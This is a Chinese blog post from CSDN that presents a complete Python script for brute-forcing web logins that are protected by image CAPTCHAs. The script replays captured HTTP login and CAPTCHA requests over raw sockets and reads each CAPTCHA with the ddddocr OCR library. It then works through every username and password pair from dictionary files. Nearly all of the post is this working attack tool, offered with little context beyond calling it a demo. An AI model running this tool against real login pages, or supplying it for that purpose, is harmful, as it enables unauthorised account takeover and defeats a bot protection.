python爆破登录验证码demo

最新推荐文章于 2024-05-20 23:17:11 发布
最新推荐文章于 2024-05-20 23:17:11 发布
阅读量249 收藏 1
点赞数
分类专栏: 奇怪脚本 渗透工具编写 文章标签: python 渗透测试 登录爆破 验证码识别
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/131559174
版权

这是一个演示

攻击画面
在这里插入图片描述

指定
参数一:指定登录数据包
参数二:指定用户字典
参数三:指定密码字典
参数四:指定获取验证码数据包
在这里插入图片描述
以下是输出详解
在这里插入图片描述
识别验证码使用的是ddddocr库》》》https://github.com/sml2h3/ddddocr
识别效果不错,看截图(但因仅限这种)
在这里插入图片描述

源代码

import base64
import socket
import json
import hashlib
import time
import execjs
import ddddocr


class http:
    def __init__(self,dataPath,userPath,pwdPath,codePath):
        self.dataPath = dataPath
        self.userPath = userPath
        self.pwdPath = pwdPath
        self.codePath = codePath

    def run(self):
        # wirte code
        login_ip_port = self.getInfo(self.dataPath)
        code_ip_port = self.getInfo(self.codePath)
        user_pwd = self.readDict(self.userPath,self.pwdPath)
        print(login_ip_port,"\n",code_ip_port)
        #code = self.loadCode(code_ip_port,"bin")
        ccList = []
        for i in user_pwd['users']:
            for j in user_pwd['pwds']:
                ccList.append({"user":i.strip(),"pwd":j.strip(),"code":""})
        print("user_pwd_len:",len(ccList))
        for info in ccList:
            info["code"]=self.loadCode(code_ip_port,"bin")
            print(info)
            self.sendHttp(info,login_ip_port)
            time.sleep(1)

    def loadCode(self,ip_port,mod):
        self.s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s2.connect((ip_port["ip"], ip_port["port"]))
        self.s2.sendall(ip_port["context"].encode())
        # 接收响应
        # 使用循环接收所有数据
        buffer_size = 4096  # 每次接收的最大字节数
        data = b''
        while True:
            part = self.s2.recv(buffer_size)
            data += part
            if not part:
                # 如果没有更多的数据,跳出循环
                break
        self.codeRes = self.SaveImg(data,mod)

        code = self.delectImg(self.codeRes["md5"])
        self.s2.close()
        return code



    def delectImg(self,path):
        ocr = ddddocr.DdddOcr(beta=True)

        with open(path, 'rb') as f:
            image = f.read()

        res = ocr.classification(image)
        return res


    def md5(self,string):
        md5_hash = hashlib.md5()
        md5_hash.update(string.encode('utf-8'))
        return md5_hash.hexdigest()


    def SaveImg(self,data,mod):
        out = data.decode(encoding='iso-8859-1').split("\r\n\r\n")[1]
        if mod=="b64":
            CodeRes = json.loads(out)
            img = CodeRes['img']
            CodeRes["md5"] = f"./temp/{self.md5(img)}.jpg"
            print(CodeRes["md5"])
            image_data = base64.b64decode(img)
            with open(CodeRes["md5"], 'wb') as f:
                f.write(image_data)
            return CodeRes
        elif mod=="bin":
            CodeRes= {}
            CodeRes["md5"] = f"./temp/{self.md5(out)}.jpg"
            print(CodeRes["md5"])
            with open(CodeRes["md5"], 'wb') as f:
                f.write(out.encode(encoding="iso-8859-1"))
            return CodeRes
    def readDict(self,userPath,pwdPath):
        with open(userPath,"r",encoding="utf-8") as f:
            users = f.readlines()
        with open(pwdPath, "r", encoding="utf-8") as f:
            pwds = f.readlines()
        user_pwd = {"users": users, "pwds": pwds}

        return user_pwd


    def pwdJsEncryt(self,pwd):
        script_file = './utils/PwdEncryt.js'  # 替换为实际的JavaScript文件路径
        with open(script_file, 'r',encoding="utf-8") as file:
            script_code = file.read()
        ctx = execjs.compile(script_code)
        result = ctx.call('hashPassword', pwd)  # 调用JavaScript函数
        print(result)  # 输出结果
        return result


    def sendHttp(self,cc,ip_port,encryt=0):
        tempUser = cc["user"]
        if encryt:
            tempPwd = self.pwdJsEncryt(cc["pwd"]).strip()
        else:
            tempPwd = cc["pwd"]
        tempCode = cc["code"]

        data = ip_port["context"]
        # print(data.encode())
        data = data.replace("{{u}}",tempUser)
        # print(data.encode())
        data = data.replace("{{p}}",tempPwd)
        # print(data.encode())
        data = data.replace("{{c}}",tempCode)
        # print(data.encode())
        print("-"*50+f"\n{data}\n"+"-"*50)
        self.s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s1.connect((ip_port["ip"], ip_port["port"]))
        self.s1.sendall(data.encode())
        # 接收响应
        buffer_size = 4096  # 每次接收的最大字节数
        data = b''
        while True:
            part = self.s1.recv(buffer_size)
            data += part
            if not part:
                # 如果没有更多的数据,跳出循环
                break
        # 打印响应
        print(data.decode(encoding="iso-8859-1"))
        self.s1.close()
        return

    def getInfo(self,dataPath):
        with open(dataPath,"r",encoding="utf-8") as f:

            context = f.read()
            res = context.split("\n")
            for i in res:
                if i.startswith("Host:"):
                    # 提取Host头的值
                    ip = i.split(":")[1].strip()
                    port = int(i.split(":")[2].strip())
                    # port = 443
                    ret = {"ip":ip,"port":port,"context":context}
            return ret



if __name__ == "__main__":
    a = http("./login.txt","./utils/user500.txt","./utils/pwd500.txt","./code.txt")
    a.run()

这就是个demo

我重来不说话
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
python模拟登录验证码的网站demo
09-06
python使用requests模拟登录验证码的专利网站demo
python编写字典爆破网站登录|思路
向阳-Y.的博客
10-31 1646
在做渗透时,因为太菜了,不会用网上的爆破工具,自己就即兴写了一个简单的字典爆破。新手小白可以借鉴思路,就当学习了。大佬请绕道!! 如果有好用的爆破工具,欢迎大佬推荐~
burp跑字典,验证码破解4/6
YH,生活越来越好
05-16 5348
Burp Suite 是一种常用的网络安全测试工具,它可以通过暴力破解的方式来。如何使用 Burp Suite 进行呢?
暴力破解及验证码安全
最新发布
XLbb的博客
05-20 1661
网站是否双因素认证、Token值等等 用抓包工具查看是否有token值;双因素认证查看登录是的需要验证码; 可以尝试用sqlmap工具检测查看是否有注入点;基于Token破解 由于token值输出在前端源代码中,容易被获取,因此也就失去了防暴力破解的意义,一般Token在防止CSRF上会有比较好的功效。
网络安全专栏——逆向入门爆破登录学习(图文)
MZH
11-26 8277
步骤系列文章前言1.需要的软件资源2.用调试器解析软件2.用调试器打开程序3.找到关键的登录判断部分4.导出补丁持久化保存胜利成果5.测试一下效果附录.引用资料总结 系列文章 提示:转到网络安全专栏,观看更多内容! 点我直达–>网络安全专栏 前言 学习网络安全,首先得知道敌人是如何出手,如何攻击的,才能有针对性的防御。郑重声明,逆向学习的初衷是为了实现网络安全,大家不要用于非法用途,尊重知识产权。 本文根据果核的逆向教程制作,使用了果核的软件资源。 怎么说呢,软件都是根据源码编译而成的,软件正常的登
登录密码爆破
gl620321的博客
08-11 6020
一、登录密码爆破 1.登录猜解猜解用户密码爆破属于撞库一类。通过弱口令字典暴力尝试登陆达到猜解用户密码。 2.一般登陆都要验证码,而突破验证码主要有两种: 绕过严重码 自动识别验证码 管理院权限登陆 开启了session,随机生成了一串字符串 查看登陆检测,判断是否开启传输了三个post 存在的话去判断验证验证码要是和session的不同,它就回到login这个页面 匹配的话,...
带有验证码的爆破(包含Burp suite工具爆破)
weixin_43960066的博客
09-16 7055
关于含有验证爆破的一些总结!
网络安全专栏——逆向入门爆破登录学习(图文)_逆向图文
Hacker_gangg的博客
02-29 1203
网络安全专栏——逆向入门爆破登录学习(图文)_逆向图文
get_yanzhengma.zip_python 登录_验证码_验证码识别
09-15
这个名为"get_yanzhengma.zip"的压缩包文件显然包含了使用Python编写的验证码识别程序,这对于理解和自动化处理登录过程中的验证验证非常有帮助。让我们深入探讨一下相关的知识点。 首先,Python是一种广泛用于...
python 开发动态验证demo源码+使用说明
02-02
本教程将深入探讨如何使用Python来开发动态验证码,并提供一个简单的demo源码和使用说明。 首先,我们需要理解动态验证码的基本要素。它通常包括以下几个部分: 1. **随机性**:验证码的内容应是随机生成的,确保...
Python完全识别验证码自动登录实例详解
09-18
今天小编就为大家分享一篇Python完全识别验证码自动登录实例详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
前端安全问题——暴破登录
Jack, what else can you do besides holding your little darling?
03-22 2298
声明:本文仅供学习和研究用途,请勿用作违法犯罪之事,若违反则与本人无关。暴力破解登录是一种常见的前端安全问题,属于未授权访问安全问题的一种,攻击者尝试使用不同的用户名和密码组合来登录到受害者的账户,直到找到正确的用户名和密码组合为止。攻击者可以使用自动化工具,如字典攻击、暴力攻击等来加快攻击速度。这种攻击通常针对用户使用弱密码、没有启用多因素身份验证等情况。
验证爆破
HAKUNAMATATATTA的博客
11-28 1817
burp配合xp_CAPTCHA进行验证爆破思路
暴力破解之验证码识别
希望我的博客,能帮上你解决学习中工作中所遇到的问题
04-10 3590
渗透测试过程中,现在验证码越来越多,这对测试的时候遇到的阻力不小,一位大佬给我安利了一个burp插件,Captcha-killer,可以自动对验证码进行识别,从而进行暴力破解。验证码识别是使用了python的开源验证码识别接口ddddocr模块。使用burp抓包,把验证码的包发到Captcha-killer模块。本地尝试一下运行脚本,出现下面信息,代表运行成功。下载好Captcha-Killer模块,选择生成器,这样就可以进行暴力破解啦。【下载不了的,我把安装包放到文末】回到插件,点击获取验证码。
用户登录限制(防止爆破登录漏洞)
weixin_48507846的博客
04-13 1585
用户登录限制(防止爆破登录漏洞) 前言 针对用户登录未作限制,批量爆破成功密码登陆系统的漏洞问题。 将以下个方法再嵌入你登录方法里面的合适位置。 下面是我嵌入位置参考: @RequestMapping(value = "/login", method = RequestMethod.POST) public @ResponseBody String loginPost(HttpServletRequest request, HttpServletResponse response,
在线密码破解教程,web登录爆破(hydra的简单使用)
热门推荐
weixin_43039349的博客
04-16 13万+
hydra是一个极其强大的在线破解密码的工具(人称爆破神器) ——本文献给无聊的计算机系大学生们 密码破解从大类来分可以分为两种,一种是在线破解,这种方hydra式一般要求待破解的对象对我们来说是可以正常提供服务的,通俗来讲就是能够让我们通过一定的途径去尝试登录,或者是验证用户密码的正确性。而另一种就是本地破解,比如wifi抓包破解wifi密码,只要提前抓到了wifi登录验证的数据包,就可以在本地...
渗透测试-验证码的爆破与绕过
道阻且长,行则将至。
01-26 3万+
验证码识别 点击F12打开开发者工具,查看前端源码,找到生成验证码的URL。 将URL输入搜索框,验证是否正确。
burp密码爆破字典_验证爆破总结及python实现爆破功能
weixin_39711441的博客
11-26 2200
本文作者:Junsec(Ms08067实验室Python渗透小组成员)验证码生成分为两种:1.本地js生产验证码。2.请求url刷新验证码,代码根据这种情况编写。.功能简介:-u 用户名-t 后台地址-p 字典地址-c 验证码地址-k 使用云打码平台识别验证码,默认使用为pytesseract识别验证码用法:python test_captche.py -u admin -t http:...
python 爬虫 登录验证
08-19
Python爬虫中,登录验证码通常需要进行以下步骤处理:<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* *3* [【Python爬虫】Session攻破爬虫登陆...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值